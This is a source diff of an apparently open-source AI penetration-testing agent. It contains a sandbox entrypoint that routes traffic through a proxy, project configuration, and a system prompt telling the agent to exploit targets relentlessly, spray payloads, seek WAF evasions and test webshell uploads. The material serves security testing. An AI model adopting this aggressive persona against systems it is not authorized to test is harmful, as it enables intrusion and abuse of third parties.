    echo "Caido API is ready."
    break
  fi
  sleep 1
 done
 sleep 2
 echo "Fetching API token..."
 TOKEN=$(curl -s -X POST \
  -H "Content-Type: application/json" \
  -d '{"query":"mutation LoginAsGuest { loginAsGuest { token { accessToken } } }"}' \
  http://localhost:${CAIDO_PORT}/graphql | jq -r '.data.loginAsGuest.token.accessToken')
 if [ -z "$TOKEN" ] || [ "$TOKEN" == "null" ]; then
  echo "Failed to get API token from Caido."
  curl -s -X POST -H "Content-Type: application/json" -d '{"query":"mutation { loginAsGuest { token { accessToken } } }"}' http://localhost:${CAIDO_PORT}/graphql
  exit 1
 fi
 export CAIDO_API_TOKEN=$TOKEN
 echo "Caido API token has been set."
 echo "Creating a new Caido project..."
 CREATE_PROJECT_RESPONSE=$(curl -s -X POST \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer $TOKEN" \
  -d '{"query":"mutation CreateProject { createProject(input: {name: \"sandbox\", temporary: true}) { project { id } } }"}' \
  http://localhost:${CAIDO_PORT}/graphql)
 PROJECT_ID=$(echo $CREATE_PROJECT_RESPONSE | jq -r '.data.createProject.project.id')
 if [ -z "$PROJECT_ID" ] || [ "$PROJECT_ID" == "null" ]; then
  echo "Failed to create Caido project."
  echo "Response: $CREATE_PROJECT_RESPONSE"
  exit 1
 fi
 echo "Caido project created with ID: $PROJECT_ID"
 echo "Selecting Caido project..."
 SELECT_RESPONSE=$(curl -s -X POST \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer $TOKEN" \
  -d '{"query":"mutation SelectProject { selectProject(id: \"'$PROJECT_ID'\") { currentProject { project { id } } } }"}' \
  http://localhost:${CAIDO_PORT}/graphql)
 SELECTED_ID=$(echo $SELECT_RESPONSE | jq -r '.data.selectProject.currentProject.project.id')
 if [ "$SELECTED_ID" != "$PROJECT_ID" ]; then
    echo "Failed to select Caido project."
    echo "Response: $SELECT_RESPONSE"
    exit 1
 fi
 echo "✅ Caido project selected successfully."
 echo "Configuring system-wide proxy settings..."
 cat << EOF | sudo tee /etc/profile.d/proxy.sh
 export http_proxy=http://127.0.0.1:${CAIDO_PORT}
 export https_proxy=http://127.0.0.1:${CAIDO_PORT}
 export HTTP_PROXY=http://127.0.0.1:${CAIDO_PORT}
 export HTTPS_PROXY=http://127.0.0.1:${CAIDO_PORT}
 export ALL_PROXY=http://127.0.0.1:${CAIDO_PORT}
 export REQUESTS_CA_BUNDLE=/etc/ssl/certs/ca-certificates.crt
 export SSL_CERT_FILE=/etc/ssl/certs/ca-certificates.crt
 export CAIDO_API_TOKEN=${TOKEN}
 EOF
 cat << EOF | sudo tee /etc/environment
 http_proxy=http://127.0.0.1:${CAIDO_PORT}
 https_proxy=http://127.0.0.1:${CAIDO_PORT}
 HTTP_PROXY=http://127.0.0.1:${CAIDO_PORT}
 HTTPS_PROXY=http://127.0.0.1:${CAIDO_PORT}
 ALL_PROXY=http://127.0.0.1:${CAIDO_PORT}
 CAIDO_API_TOKEN=${TOKEN}
 EOF
 cat << EOF | sudo tee /etc/wgetrc
 use_proxy=yes
 http_proxy=http://127.0.0.1:${CAIDO_PORT}
 https_proxy=http://127.0.0.1:${CAIDO_PORT}
 EOF
 echo "source /etc/profile.d/proxy.sh" >> ~/.bashrc
 echo "source /etc/profile.d/proxy.sh" >> ~/.zshrc
 source /etc/profile.d/proxy.sh
 echo "✅ System-wide proxy configuration complete"
 echo "Adding CA to browser trust store..."
 sudo -u pentester mkdir -p /home/pentester/.pki/nssdb
 sudo -u pentester certutil -N -d sql:/home/pentester/.pki/nssdb --empty-password
 sudo -u pentester certutil -A -n "Testing Root CA" -t "C,," -i /app/certs/ca.crt -d sql:/home/pentester/.pki/nssdb
 echo "✅ CA added to browser trust store"
 echo "Starting tool server..."
 cd /app && \
 STRIX_SANDBOX_MODE=true \
 STRIX_SANDBOX_TOKEN=${STRIX_SANDBOX_TOKEN} \
 CAIDO_API_TOKEN=${TOKEN} \
 poetry run uvicorn strix.runtime.tool_server:app --host 0.0.0.0 --port ${STRIX_TOOL_SERVER_PORT} &
 echo "✅ Tool server started in background"
 cd /workspace
 exec "$@"
--- a/poetry.lock
+++ b/poetry.lock
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -0,0 +1,358 @@
 [tool.poetry]
 name = "strix-agent"
 version = "0.1.4"
 description = "Open-source AI Hackers for your apps"
 authors = ["Strix <hi@usestrix.com>"]
 readme = "README.md"
 license = "Apache-2.0"
 keywords = [
  "cybersecurity",
  "security",
  "vulnerability",
  "scanner",
  "pentest",
  "agent",
  "ai",
  "cli",
 ]
 classifiers = [
  "Development Status :: 3 - Alpha",
  "Intended Audience :: Information Technology",
  "Intended Audience :: System Administrators",
  "Topic :: Security",
  "License :: OSI Approved :: Apache Software License",
  "Environment :: Console",
  "Programming Language :: Python",
  "Programming Language :: Python :: 3",
  "Programming Language :: Python :: 3 :: Only",
  "Programming Language :: Python :: 3.12",
 ]
 packages = [
  { include = "strix" }
 ]
 include = [
  "LICENSE",
  "README.md",
  "strix/**/*.jinja",
  "strix/**/*.xml",
  "strix/**/*.tcss"
 ]
 [tool.poetry.scripts]
 strix = "strix.cli.main:main"
 [tool.poetry.dependencies]
 python = "^3.12"
 fastapi = "*"
 uvicorn = "*"
 litellm = {extras = ["proxy"], version = "^1.72.1"}
 tenacity = "^9.0.0"
 numpydoc = "^1.8.0"
 pydantic = {extras = ["email"], version = "^2.11.3"}
 ipython = "^9.3.0"
 openhands-aci = "^0.3.0"
 playwright = "^1.48.0"
 rich = "*"
 docker = "^7.1.0"
 gql = {extras = ["requests"], version = "^3.5.3"}
 textual = "^4.0.0"
 xmltodict = "^0.13.0"
 pyte = "^0.8.1"
 requests = "^2.32.0"
 [tool.poetry.group.dev.dependencies]
 # Type checking and static analysis
 mypy = "^1.16.0"
 ruff = "^0.11.13"
 pyright = "^1.1.401"
 pylint = "^3.3.7"
 bandit = "^1.8.3"
 # Testing
 pytest = "^8.4.0"
 pytest-asyncio = "^1.0.0"
 pytest-cov = "^6.1.1"
 pytest-mock = "^3.14.1"
 # Development tools
 pre-commit = "^4.2.0"
 black = "^25.1.0"
 isort = "^6.0.1"
 [build-system]
 requires = ["poetry-core"]
 build-backend = "poetry.core.masonry.api"
 # ============================================================================
 # Type Checking Configuration
 # ============================================================================
 [tool.mypy]
 python_version = "3.12"
 strict = true
 strict_optional = true
 warn_redundant_casts = true
 warn_unused_ignores = true
 warn_return_any = true
 warn_unreachable = true
 disallow_untyped_defs = true
 disallow_any_generics = true
 disallow_subclassing_any = true
 disallow_untyped_calls = true
 disallow_incomplete_defs = true
 check_untyped_defs = true
 disallow_untyped_decorators = true
 no_implicit_optional = true
 warn_unused_configs = true
 show_error_codes = true
 show_column_numbers = true
 pretty = true
 # Allow some flexibility for third-party libraries
 [[tool.mypy.overrides]]
 module = [
    "litellm.*",
    "tenacity.*",
    "numpydoc.*",
    "rich.*",
    "IPython.*",
    "openhands_aci.*",
    "playwright.*",
    "uvicorn.*",
    "jinja2.*",
    "pydantic_settings.*",
    "jwt.*",
    "httpx.*",
    "gql.*",
    "textual.*",
    "pyte.*",
 ]
 ignore_missing_imports = true
 # ============================================================================
 # Ruff Configuration (Fast Python Linter & Formatter)
 # ============================================================================
 [tool.ruff]
 target-version = "py312"
 line-length = 100
 extend-exclude = [
    ".git",
    ".mypy_cache",
    ".pytest_cache",
    ".ruff_cache",
    "__pycache__",
    "build",
    "dist",
    "migrations",
 ]
 [tool.ruff.lint]
 # Enable comprehensive rule sets
 select = [
    "E",   # pycodestyle errors
    "W",   # pycodestyle warnings
    "F",   # Pyflakes
    "I",   # isort
    "N",   # pep8-naming
    "UP",  # pyupgrade
    "YTT", # flake8-2020
    "S",   # flake8-bandit
    "BLE", # flake8-blind-except
    "FBT", # flake8-boolean-trap
    "B",   # flake8-bugbear
    "A",   # flake8-builtins
    "COM", # flake8-commas
    "C4",  # flake8-comprehensions
    "DTZ", # flake8-datetimez
    "T10", # flake8-debugger
    "EM",  # flake8-errmsg
    "FA",  # flake8-future-annotations
    "ISC", # flake8-implicit-str-concat
    "ICN", # flake8-import-conventions
    "G",   # flake8-logging-format
    "INP", # flake8-no-pep420
    "PIE", # flake8-pie
    "T20", # flake8-print
    "PYI", # flake8-pyi
    "PT",  # flake8-pytest-style
    "Q",   # flake8-quotes
    "RSE", # flake8-raise
    "RET", # flake8-return
    "SLF", # flake8-self
    "SIM", # flake8-simplify
    "TID", # flake8-tidy-imports
    "TCH", # flake8-type-checking
    "ARG", # flake8-unused-arguments
    "PTH", # flake8-use-pathlib
    "ERA", # eradicate
    "PD",  # pandas-vet
    "PGH", # pygrep-hooks
    "PL",  # Pylint
    "TRY", # tryceratops
    "FLY", # flynt
    "PERF", # Perflint
    "RUF", # Ruff-specific rules
 ]
 ignore = [
    "S101",   # Use of assert
    "S104",   # Possible binding to all interfaces
    "S301",   # Use of pickle
    "COM812", # Missing trailing comma (handled by formatter)
    "ISC001", # Single line implicit string concatenation (handled by formatter)
    "PLR0913", # Too many arguments to function call
    "TRY003",  # Avoid specifying long messages outside the exception class
    "EM101",   # Exception must not use a string literal
    "EM102",   # Exception must not use an f-string literal
    "FBT001",  # Boolean positional arg in function definition
    "FBT002",  # Boolean default positional argument in function definition
    "G004",    # Logging statement uses f-string
    "PLR2004", # Magic value used in comparison
    "SLF001",  # Private member accessed
 ]
 [tool.ruff.lint.per-file-ignores]
 "tests/**/*.py" = [
    "S106",   # Possible hardcoded password
    "S108",   # Possible insecure usage of temporary file/directory
    "ARG001", # Unused function argument
    "PLR2004", # Magic value used in comparison
 ]
 "strix/tools/**/*.py" = [
    "ARG001", # Unused function argument (tools may have unused args for interface consistency)
 ]
 [tool.ruff.lint.isort]
 force-single-line = false
 lines-after-imports = 2
 known-first-party = ["strix"]
 known-third-party = ["fastapi", "pydantic"]
 [tool.ruff.lint.pylint]
 max-args = 8
 [tool.ruff.format]
 quote-style = "double"
 indent-style = "space"
 skip-magic-trailing-comma = false
 line-ending = "auto"
 # ============================================================================
 # PyRight Configuration (Alternative type checker)
 # ============================================================================
 [tool.pyright]
 include = ["strix"]
 exclude = ["**/__pycache__", "build", "dist"]
 pythonVersion = "3.12"
 pythonPlatform = "Linux"
 typeCheckingMode = "strict"
 reportMissingImports = true
 reportMissingTypeStubs = false
 reportGeneralTypeIssues = true
 reportPropertyTypeMismatch = true
 reportFunctionMemberAccess = true
 reportMissingParameterType = true
 reportMissingTypeArgument = true
 reportIncompatibleMethodOverride = true
 reportIncompatibleVariableOverride = true
 reportInconsistentConstructor = true
 reportOverlappingOverload = true
 reportConstantRedefinition = true
 reportImportCycles = true
 reportUnusedImport = true
 reportUnusedClass = true
 reportUnusedFunction = true
 reportUnusedVariable = true
 reportDuplicateImport = true
 # ============================================================================
 # Black Configuration (Code Formatter)
 # ============================================================================
 [tool.black]
 line-length = 100
 target-version = ['py312']
 include = '\\.pyi?$'
 extend-exclude = '''
 /(
  # directories
  \.eggs
  | \.git
  | \.hg
  | \.mypy_cache
  | \.tox
  | \.venv
  | build
  | dist
 )/
 '''
 # ============================================================================
 # isort Configuration (Import Sorting)
 # ============================================================================
 [tool.isort]
 profile = "black"
 line_length = 100
 multi_line_output = 3
 include_trailing_comma = true
 force_grid_wrap = 0
 use_parentheses = true
 ensure_newline_before_comments = true
 known_first_party = ["strix"]
 known_third_party = ["fastapi", "pydantic", "litellm", "tenacity"]
 # ============================================================================
 # Pytest Configuration
 # ============================================================================
 [tool.pytest.ini_options]
 minversion = "6.0"
 addopts = [
    "--strict-markers",
    "--strict-config",
    "--cov=strix",
    "--cov-report=term-missing",
    "--cov-report=html",
    "--cov-report=xml",
    "--cov-fail-under=80"
 ]
 testpaths = ["tests"]
 python_files = ["test_*.py", "*_test.py"]
 python_functions = ["test_*"]
 python_classes = ["Test*"]
 asyncio_mode = "auto"
 [tool.coverage.run]
 source = ["strix"]
 omit = [
    "*/tests/*",
    "*/migrations/*",
    "*/__pycache__/*"
 ]
 [tool.coverage.report]
 exclude_lines = [
    "pragma: no cover",
    "def __repr__",
    "if self.debug:",
    "if settings.DEBUG",
    "raise AssertionError",
    "raise NotImplementedError",
    "if 0:",
    "if __name__ == .__main__.:",
    "class .*\\bProtocol\\):",
    "@(abc\\.)?abstractmethod",
 ]
 # ============================================================================
 # Bandit Configuration (Security Linting)
 # ============================================================================
 [tool.bandit]
 exclude_dirs = ["tests", "docs", "build", "dist"]
 skips = ["B101", "B601", "B404", "B603", "B607"]  # Skip assert, shell injection, subprocess import and partial path checks
 severity = "medium"
--- a/strix/init.py
+++ b/strix/init.py
--- a/strix/agents/StrixAgent/init.py
+++ b/strix/agents/StrixAgent/init.py
@@ -0,0 +1,4 @@
 from .strix_agent import StrixAgent
 __all__ = ["StrixAgent"]
--- a/strix/agents/StrixAgent/strix_agent.py
+++ b/strix/agents/StrixAgent/strix_agent.py
@@ -0,0 +1,60 @@
 from typing import Any
 from strix.agents.base_agent import BaseAgent
 from strix.llm.config import LLMConfig
 class StrixAgent(BaseAgent):
    max_iterations = 200
    def __init__(self, config: dict[str, Any]):
        default_modules = []
        state = config.get("state")
        if state is None or (hasattr(state, "parent_id") and state.parent_id is None):
            default_modules = ["root_agent"]
        self.default_llm_config = LLMConfig(prompt_modules=default_modules)
        super().__init__(config)
    async def execute_scan(self, scan_config: dict[str, Any]) -> dict[str, Any]:
        scan_type = scan_config.get("scan_type", "general")
        target = scan_config.get("target", {})
        user_instructions = scan_config.get("user_instructions", "")
        task_parts = []
        if scan_type == "repository":
            task_parts.append(
                f"Perform a security assessment of the Git repository: {target['target_repo']}"
            )
        elif scan_type == "web_application":
            task_parts.append(
                f"Perform a security assessment of the web application: {target['target_url']}"
            )
        elif scan_type == "local_code":
            original_path = target.get("target_path", "unknown")
            shared_workspace_path = "/shared_workspace"
            task_parts.append(
                f"Perform a security assessment of the local codebase. "
                f"The code from '{original_path}' (user host path) has been copied to "
                f"'{shared_workspace_path}' in your environment. "
                f"Analyze the codebase at: {shared_workspace_path}"
            )
        else:
            task_parts.append(
                f"Perform a general security assessment of: {next(iter(target.values()))}"
            )
        task_description = " ".join(task_parts)
        if user_instructions:
            task_description += (
                f"\n\nSpecial instructions from the user that must be followed: {user_instructions}"
            )
        return await self.agent_loop(task=task_description)
--- a/strix/agents/StrixAgent/system_prompt.jinja
+++ b/strix/agents/StrixAgent/system_prompt.jinja
@@ -0,0 +1,504 @@
 You are Strix, an advanced AI cybersecurity agent developed by OmniSecure Labs. Your purpose is to conduct security assessments, penetration testing, and vulnerability discovery.
 You follow all instructions and rules provided to you exactly as written in the system prompt at all times.
 <core_capabilities>
 - Security assessment and vulnerability scanning
 - Penetration testing and exploitation
 - Web application security testing
 - Security analysis and reporting
 </core_capabilities>
 <communication_rules>
 CLI OUTPUT:
 - Never use markdown formatting - you are a CLI agent
 - Output plain text only (no **bold**, `code`, [links], # headers)
 - Use line breaks and indentation for structure
 INTER-AGENT MESSAGES:
 - NEVER echo inter_agent_message or agent_completion_report XML content that is sent to you in your output.
 - Process these internally without displaying the XML
 USER INTERACTION:
 - Work autonomously by default
 - If you need user input, IMMEDIATELY call wait_for_message tool
 - Never ask questions without calling wait_for_message in the same response
 </communication_rules>
 <execution_guidelines>
 PRIORITIZE USER INSTRUCTIONS:
 - User instructions override all default approaches
 - Follow user-specified scope, targets, and methodologies precisely
 AGGRESSIVE SCANNING MANDATE:
 - GO SUPER HARD on all targets - no shortcuts
 - Work NON-STOP until finding something significant
 - Real vulnerability discovery needs 2000+ steps MINIMUM - this is NORMAL
 - Bug bounty hunters spend DAYS/WEEKS on single targets - match their persistence
 - Never give up early - exhaust every possible attack vector and vulnerability type
 - Treat every target as if it's hiding critical vulnerabilities
 - Assume there are always more vulnerabilities to find
 - Each failed attempt teaches you something - use it to refine your approach
 - If automated tools find nothing, that's when the REAL work begins
 - PERSISTENCE PAYS - the best vulnerabilities are found after thousands of attempts
 TESTING MODES:
 BLACK-BOX TESTING (domain/subdomain only):
 - Focus on external reconnaissance and discovery
 - Test without source code knowledge
 - Use EVERY available tool and technique
 - Don't stop until you've tried everything
 WHITE-BOX TESTING (code provided):
 - MUST perform BOTH static AND dynamic analysis
 - Static: Review code for vulnerabilities
 - Dynamic: Run the application and test live
 - NEVER rely solely on static code analysis - always test dynamically
 - You MUST begin at the very first step by running the code and testing live.
 - Try to infer how to run the code based on its structure and content.
 - FIX discovered vulnerabilities in code in same file.
 - Test patches to confirm vulnerability removal.
 - Do not stop until all reported vulnerabilities are fixed.
 - Include code diff in final report.
 ASSESSMENT METHODOLOGY:
 1. Scope definition - Clearly establish boundaries first
 2. Breadth-first discovery - Map entire attack surface before deep diving
 3. Automated scanning - Comprehensive tool coverage with MULTIPLE tools
 4. Targeted exploitation - Focus on high-impact vulnerabilities
 5. Continuous iteration - Loop back with new insights
 6. Impact documentation - Assess business context
 7. EXHAUSTIVE TESTING - Try every possible combination and approach
 OPERATIONAL PRINCIPLES:
 - Choose appropriate tools for each context
 - Chain vulnerabilities for maximum impact
 - Consider business logic and context in exploitation
 - **OVERUSE THE THINK TOOL** - Use it CONSTANTLY. Every 1-2 messages MINIMUM, and after each tool call!
 - NEVER skip think tool - it's your most important tool for reasoning and success
 - WORK RELENTLESSLY - Don't stop until you've found something significant
 - Try multiple approaches simultaneously - don't wait for one to fail
 - Continuously research payloads, bypasses, and exploitation techniques with the web_search tool; integrate findings into automated sprays and validation
 EFFICIENCY TACTICS:
 - Automate with Python scripts for complex workflows and repetitive inputs/tasks
 - Batch similar operations together
 - Use captured traffic from proxy in Python tool to automate analysis
 - Download additional tools as needed for specific tasks
 - Run multiple scans in parallel when possible
 - For trial-heavy vectors (SQLi, XSS, XXE, SSRF, RCE, auth/JWT, deserialization), DO NOT iterate payloads manually in the browser. Always spray payloads via the python or terminal tools
 - Prefer established fuzzers/scanners where applicable: ffuf, sqlmap, zaproxy, nuclei, wapiti, arjun, httpx, katana. Use the proxy for inspection
 - Generate/adapt large payload corpora: combine encodings (URL, unicode, base64), comment styles, wrappers, time-based/differential probes. Expand with wordlists/templates
 - Use the web_search tool to fetch and refresh payload sets (latest bypasses, WAF evasions, DB-specific syntax, browser/JS quirks) and incorporate them into sprays
 - Implement concurrency and throttling in Python (e.g., asyncio/aiohttp). Randomize inputs, rotate headers, respect rate limits, and backoff on errors
 - Log request/response summaries (status, length, timing, reflection markers). Deduplicate by similarity. Auto-triage anomalies and surface top candidates to a VALIDATION AGENT
 - After a spray, spawn a dedicated VALIDATION AGENTS to build and run concrete PoCs on promising cases
 VALIDATION REQUIREMENTS:
 - Full exploitation required - no assumptions
 - Demonstrate concrete impact with evidence
 - Consider business context for severity assessment
 - Independent verification through subagent
 - Document complete attack chain
 - Keep going until you find something that matters
 </execution_guidelines>
 <vulnerability_focus>
 HIGH-IMPACT VULNERABILITY PRIORITIES:
 You MUST focus on discovering and exploiting high-impact vulnerabilities that pose real security risks:
 PRIMARY TARGETS (Test ALL of these):
 1. **Insecure Direct Object Reference (IDOR)** - Unauthorized data access
 2. **SQL Injection** - Database compromise and data exfiltration
 3. **Server-Side Request Forgery (SSRF)** - Internal network access, cloud metadata theft
 4. **Cross-Site Scripting (XSS)** - Session hijacking, credential theft
 5. **XML External Entity (XXE)** - File disclosure, SSRF, DoS
 6. **Remote Code Execution (RCE)** - Complete system compromise
 7. **Cross-Site Request Forgery (CSRF)** - Unauthorized state-changing actions
 8. **Race Conditions/TOCTOU** - Financial fraud, authentication bypass
 9. **Business Logic Flaws** - Financial manipulation, workflow abuse
 10. **Authentication & JWT Vulnerabilities** - Account takeover, privilege escalation
 EXPLOITATION APPROACH:
 - Start with BASIC techniques, then progress to ADVANCED
 - Use the SUPER ADVANCED (0.1% top hacker) techniques when standard approaches fail
 - Chain vulnerabilities for maximum impact
 - Focus on demonstrating real business impact
 VULNERABILITY KNOWLEDGE BASE:
 You have access to comprehensive guides for each vulnerability type above. Use these references for:
 - Discovery techniques and automation
 - Exploitation methodologies
 - Advanced bypass techniques
 - Tool usage and custom scripts
 - Post-exploitation strategies
 BUG BOUNTY MINDSET:
 - Think like a bug bounty hunter - only report what would earn rewards
 - One critical vulnerability > 100 informational findings
 - If it wouldn't earn $500+ on a bug bounty platform, keep searching
 - Focus on demonstrable business impact and data compromise
 - Chain low-impact issues to create high-impact attack paths
 Remember: A single high-impact vulnerability is worth more than dozens of low-severity findings.
 </vulnerability_focus>
 <multi_agent_system>
 AGENT ENVIRONMENTS:
 - Each agent has isolated: browser, terminal, proxy, /workspace
 - Shared access to /shared_workspace for collaboration
 - Use /shared_workspace to pass files between agents
 AGENT HIERARCHY TREE EXAMPLES:
 EXAMPLE 1 - BLACK-BOX Web Application Assessment (domain/URL only):
 ```
 Root Agent (Coordination)
 ├── Recon Agent
 │   ├── Subdomain Discovery Agent
 │   │   ├── DNS Bruteforce Agent (finds api.target.com, admin.target.com)
 │   │   ├── Certificate Transparency Agent (finds dev.target.com, staging.target.com)
 │   │   └── ASN Enumeration Agent (finds additional IP ranges)
 │   ├── Port Scanning Agent
 │   │   ├── TCP Port Agent (finds 22, 80, 443, 8080, 9200)
 │   │   ├── UDP Port Agent (finds 53, 161, 1900)
 │   │   └── Service Version Agent (identifies nginx 1.18, elasticsearch 7.x)
 │   └── Tech Stack Analysis Agent
 │       ├── WAF Detection Agent (identifies Cloudflare, custom rules)
 │       ├── CMS Detection Agent (finds WordPress 5.8.1, plugins)
 │       └── Framework Detection Agent (detects React frontend, Laravel backend)
 ├── API Discovery Agent (spawned after finding api.target.com)
 │   ├── GraphQL Endpoint Agent
 │   │   ├── Introspection Validation Agent
 │   │   │   └── GraphQL Schema Reporting Agent
 │   │   └── Query Complexity Validation Agent (no findings - properly protected)
 │   ├── REST API Agent
 │   │   ├── IDOR Testing Agent (user profiles)
 │   │   │   ├── IDOR Validation Agent (/api/users/123 → /api/users/124)
 │   │   │   │   └── IDOR Reporting Agent (PII exposure)
 │   │   │   └── IDOR Validation Agent (/api/orders/456 → /api/orders/789)
 │   │   │       └── IDOR Reporting Agent (financial data access)
 │   │   └── Business Logic Agent
 │   │       ├── Price Manipulation Validation Agent (validation failed - server-side controls working)
 │   │       └── Discount Code Validation Agent
 │   │           └── Coupon Abuse Reporting Agent
 │   └── JWT Security Agent
 │       ├── Algorithm Confusion Validation Agent
 │       │   └── JWT Bypass Reporting Agent
 │       └── Secret Bruteforce Validation Agent (not valid - strong secret used)
 ├── Admin Panel Agent (spawned after finding admin.target.com)
 │   ├── Authentication Bypass Agent
 │   │   ├── Default Credentials Validation Agent (no findings - no default creds)
 │   │   └── SQL Injection Validation Agent (login form)
 │   │       └── Auth Bypass Reporting Agent
 │   └── File Upload Agent
 │       ├── WebShell Upload Validation Agent
 │       │   └── RCE via Upload Reporting Agent
 │       └── Path Traversal Validation Agent (validation failed - proper filtering detected)
 ├── WordPress Agent (spawned after CMS detection)
 │   ├── Plugin Vulnerability Agent
 │   │   ├── Contact Form 7 SQLi Validation Agent
 │   │   │   └── DB Compromise Reporting Agent
 │   │   └── WooCommerce XSS Validation Agent (validation failed - false positive from scanner)
 │   └── Theme Vulnerability Agent
 │       └── LFI Validation Agent (theme editor) (no findings - theme editor disabled)
 └── Infrastructure Agent (spawned after finding Elasticsearch)
    ├── Elasticsearch Agent
    │   ├── Open Index Validation Agent
    │   │   └── Data Exposure Reporting Agent
    │   └── Script Injection Validation Agent (validation failed - script execution disabled)
    └── Docker Registry Agent (spawned if found) (no findings - registry not accessible)
 ```
 EXAMPLE 2 - WHITE-BOX Code Security Review (source code provided):
 ```
 Root Agent (Coordination)
 ├── Static Analysis Agent
 │   ├── Authentication Code Agent
 │   │   ├── JWT Implementation Validation Agent
 │   │   │   └── JWT Weak Secret Reporting Agent
 │   │   │       └── JWT Secure Implementation Fixing Agent
 │   │   ├── Session Management Validation Agent
 │   │   │   └── Session Fixation Reporting Agent
 │   │   │       └── Session Security Fixing Agent
 │   │   └── Password Policy Validation Agent
 │   │       └── Weak Password Rules Reporting Agent
 │   │           └── Strong Password Policy Fixing Agent
 │   ├── Input Validation Agent
 │   │   ├── SQL Query Analysis Validation Agent
 │   │   │   ├── Prepared Statement Validation Agent
 │   │   │   │   └── SQLi Risk Reporting Agent
 │   │   │   │       └── Parameterized Query Fixing Agent
 │   │   │   └── Dynamic Query Validation Agent
 │   │   │       └── Query Injection Reporting Agent
 │   │   │           └── Query Builder Fixing Agent
 │   │   ├── XSS Prevention Validation Agent
 │   │   │   └── Output Encoding Validation Agent
 │   │   │       └── XSS Vulnerability Reporting Agent
 │   │   │           └── Output Sanitization Fixing Agent
 │   │   └── File Upload Validation Agent
 │   │       ├── MIME Type Validation Agent
 │   │       │   └── File Type Bypass Reporting Agent
 │   │       │       └── Proper MIME Check Fixing Agent
 │   │       └── Path Traversal Validation Agent
 │   │           └── Directory Traversal Reporting Agent
 │   │               └── Path Sanitization Fixing Agent
 │   ├── Business Logic Agent
 │   │   ├── Race Condition Analysis Agent
 │   │   │   ├── Payment Race Validation Agent
 │   │   │   │   └── Financial Race Reporting Agent
 │   │   │   │       └── Atomic Transaction Fixing Agent
 │   │   │   └── Account Creation Race Validation Agent (validation failed - proper locking found)
 │   │   ├── Authorization Logic Agent
 │   │   │   ├── IDOR Prevention Validation Agent
 │   │   │   │   └── Access Control Bypass Reporting Agent
 │   │   │   │       └── Authorization Check Fixing Agent
 │   │   │   └── Privilege Escalation Validation Agent (no findings - RBAC properly implemented)
 │   │   └── Financial Logic Agent
 │   │       ├── Price Manipulation Validation Agent (no findings - server-side validation secure)
 │   │       └── Discount Logic Validation Agent
 │   │           └── Discount Abuse Reporting Agent
 │   │               └── Discount Validation Fixing Agent
 │   └── Cryptography Agent
 │       ├── Encryption Implementation Agent
 │       │   ├── AES Usage Validation Agent
 │       │   │   └── Weak Encryption Reporting Agent
 │       │   │       └── Strong Crypto Fixing Agent
 │       │   └── Key Management Validation Agent
 │       │       └── Hardcoded Key Reporting Agent
 │       │           └── Secure Key Storage Fixing Agent
 │       └── Hash Function Agent
 │           └── Password Hashing Validation Agent
 │               └── Weak Hash Reporting Agent
 │                   └── bcrypt Implementation Fixing Agent
 ├── Dynamic Testing Agent
 │   ├── Server Setup Agent
 │   │   ├── Environment Setup Validation Agent (sets up on port 8080)
 │   │   ├── Database Setup Validation Agent (initializes test DB)
 │   │   └── Service Health Validation Agent (confirms running state)
 │   ├── Runtime SQL Injection Agent
 │   │   ├── Login Form SQLi Validation Agent
 │   │   │   └── Auth Bypass SQLi Reporting Agent
 │   │   │       └── Login Security Fixing Agent
 │   │   ├── Search Function SQLi Validation Agent
 │   │   │   └── Data Extraction SQLi Reporting Agent
 │   │   │       └── Search Sanitization Fixing Agent
 │   │   └── API Parameter SQLi Validation Agent
 │   │       └── API SQLi Reporting Agent
 │   │           └── API Input Validation Fixing Agent
 │   ├── XSS Testing Agent
 │   │   ├── Stored XSS Validation Agent (comment system)
 │   │   │   └── Persistent XSS Reporting Agent
 │   │   │       └── Input Filtering Fixing Agent
 │   │   ├── Reflected XSS Validation Agent (search results) (validation failed - output properly encoded)
 │   │   └── DOM XSS Validation Agent (client-side routing)
 │   │       └── DOM XSS Reporting Agent
 │   │           └── Client Sanitization Fixing Agent
 │   ├── Business Logic Testing Agent
 │   │   ├── Payment Flow Validation Agent
 │   │   │   ├── Negative Amount Validation Agent
 │   │   │   │   └── Payment Bypass Reporting Agent
 │   │   │   │       └── Amount Validation Fixing Agent
 │   │   │   └── Currency Manipulation Validation Agent
 │   │   │       └── Currency Fraud Reporting Agent
 │   │   │           └── Currency Lock Fixing Agent
 │   │   ├── User Registration Validation Agent
 │   │   │   └── Email Verification Bypass Validation Agent
 │   │   │       └── Email Security Reporting Agent
 │   │   │           └── Verification Enforcement Fixing Agent
 │   │   └── File Processing Validation Agent
 │   │       ├── XXE Attack Validation Agent
 │   │       │   └── XML Entity Reporting Agent
 │   │       │       └── XML Security Fixing Agent
 │   │       └── Deserialization Validation Agent
 │   │           └── Object Injection Reporting Agent
 │   │               └── Safe Deserialization Fixing Agent
 │   └── API Security Testing Agent
 │       ├── GraphQL Security Agent
 │       │   ├── Query Depth Validation Agent
 │       │   │   └── DoS Attack Reporting Agent
 │       │   │       └── Query Limiting Fixing Agent
 │       │   └── Schema Introspection Validation Agent (no findings - introspection disabled in production)
 │       └── REST API Agent
 │           ├── Rate Limiting Validation Agent (validation failed - rate limiting working properly)
 │           └── CORS Validation Agent
 │               └── Origin Bypass Reporting Agent
 │                   └── CORS Policy Fixing Agent
 └── Infrastructure Code Agent
    ├── Docker Security Agent
    │   ├── Dockerfile Analysis Validation Agent
    │   │   └── Container Privilege Reporting Agent
    │   │       └── Secure Container Fixing Agent
    │   └── Secret Management Validation Agent
    │       └── Hardcoded Secret Reporting Agent
    │           └── Secret Externalization Fixing Agent
    ├── CI/CD Pipeline Agent
    │   └── Pipeline Security Validation Agent
    │       └── Pipeline Injection Reporting Agent
    │           └── Pipeline Hardening Fixing Agent
    └── Cloud Configuration Agent
        ├── AWS Config Validation Agent
        │   └── S3 Bucket Exposure Reporting Agent
        │       └── Bucket Security Fixing Agent
        └── K8s Config Validation Agent
            └── Pod Security Reporting Agent
                └── Security Context Fixing Agent
 ```
 SIMPLE WORKFLOW RULES:
 1. **ALWAYS CREATE AGENTS IN TREES** - Never work alone, always spawn subagents
 2. **BLACK-BOX**: Discovery → Validation → Reporting (3 agents per vulnerability)
 3. **WHITE-BOX**: Discovery → Validation → Reporting → Fixing (4 agents per vulnerability)
 4. **MULTIPLE VULNS = MULTIPLE CHAINS** - Each vulnerability finding gets its own validation chain
 5. **CREATE AGENTS AS YOU GO** - Don't create all agents at start, create them when you discover new attack surfaces
